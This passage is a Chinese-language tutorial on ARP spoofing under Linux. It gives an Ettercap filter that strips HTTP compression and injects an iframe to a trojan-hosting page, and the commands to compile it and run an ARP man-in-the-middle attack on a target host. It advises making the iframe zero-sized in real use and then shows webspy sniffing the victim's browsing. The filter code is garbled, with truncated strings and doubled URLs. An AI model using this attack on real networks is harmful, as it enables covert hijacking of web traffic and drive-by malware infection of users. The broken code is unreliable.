浅谈linux下arp入侵

网络上的：

if (ip.proto == TCP && tcp.dst == 80 || tcp.dst == 8080) { #...and if it contains an Accept-Encoding header... if (search(DATA.data, \

#...remove any Encoding (make sure we are using plain text) replace(\ } }

#--Inject Iframe--

if (ip.proto == TCP && tcp.src == 80 || tcp.src == 8080) { if (search(DATA.data, \

#Replace it with the body tag and an iframe to our attacking webpage

replace(\src='http://www.http://www.china-audit.com/' width=1000 height=1000 />\

msg(\ }

if (search(DATA.data, \ replace(\SRC='http://www.http://www.china-audit.com/' width=1000 height=1000 />\

msg(\ }

}

效果是差不多的。其中Ettercap 的 filter 语法规则，可以通过 man 8 etterfilter 来查看 , if 和( 之间必须有一个空格，每个 if 语句块必须用 {} 来包含。这里的语句是将标签改成自己的内容，其中www.http://www.china-audit.com/就是改成自己的网马地址就行，这里为了效果，我使用的是1000，实际中需要改成0。这里我就选择的是第二个filter，将代码保存为a.filter，然后传到BT5上，执行：

etterfilter a.filter -o a.ef

就是用etterfilter将其编译成a.ef，显示如图6。

接着我们就可以执行了，命令是：

ettercap -T -q -F /usr/a.ef -M ARP /192.168.10.233/ // 各参数意义如下：

T: 使用 TEXT 模式启动 q: 启用安静模式 F: 加载指定的 filter M: 指定使用 ARP 模块

这里是参考mickey的介绍。我们目标就是有网站的服务器233，然后通过120这台机器模拟访问。执行后效果如图7。

我们先到233的机器中将index.php文件设置简单点： heikefangxian 在嗅探前访问结果如图8。

跟着我们运行命令，再次访问，效果如图9。

百度已经被镶嵌进去了，同时在BT5中显示“iframe injected after ”，这就是我们上面写的程序中成功时返回的信息。

最后再介绍的这个小功能也是dsniff的一个功能，这次用到的是webspy，这个工具的功能很有意思。我们需要指定一个要嗅探的主机，这里还是用的192.168.10.233，这时如果主机发送HTTP请求，打开网页，webspy也会自动在本地打开一个相同的网页。首先我们在终端中输入webspy 192.168.10.233，如图10。

可以看到显示“listening on eth0”，说明已经开始监听了。这时候我们在目标机上任意登陆一个网页，比如www.http://www.china-audit.com/，显示如图11。